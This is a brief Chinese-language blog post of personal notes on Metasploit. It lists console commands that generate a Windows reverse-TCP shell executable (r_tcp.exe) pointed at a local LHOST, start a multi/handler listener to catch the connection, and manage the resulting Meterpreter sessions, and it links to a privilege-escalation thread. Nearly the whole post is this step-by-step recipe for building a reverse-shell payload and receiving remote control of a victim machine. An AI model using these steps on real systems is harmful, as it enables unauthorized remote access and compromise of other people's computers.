msf 使用记录

 

1. msfconsole

 

2. show payloads 

 

3. use windows/shell/reverse_tcp

 

4. show options

 

5. set LHOST 192.168.x.x

 

6. generate -h

 

7. generate -f r_tcp.exe -t exe

 

8. use exploit/multi/handler

 

9. use  windows/shell/reverse_tcp   (2) windows/meterpreter_reverse_tcp

 

10. show options 

 

11. set LHOST 192.168.x.x

 

12. exploit 

 

 

 

 

Meterprefer 使用 

1. background 挂入后台session

2. sessions 查看现有的后台  session

3. sessions -i 1 查看后台session id为1

 

 

[原创]Meterpreter综合提权 heatlevel

 https://bbs.ichunqiu.com/thread-17990-1-1.html?from=bbsrt1

 

posted @ 2018-02-07 09:02  m4sterx  阅读(640)  评论(0编辑  收藏  举报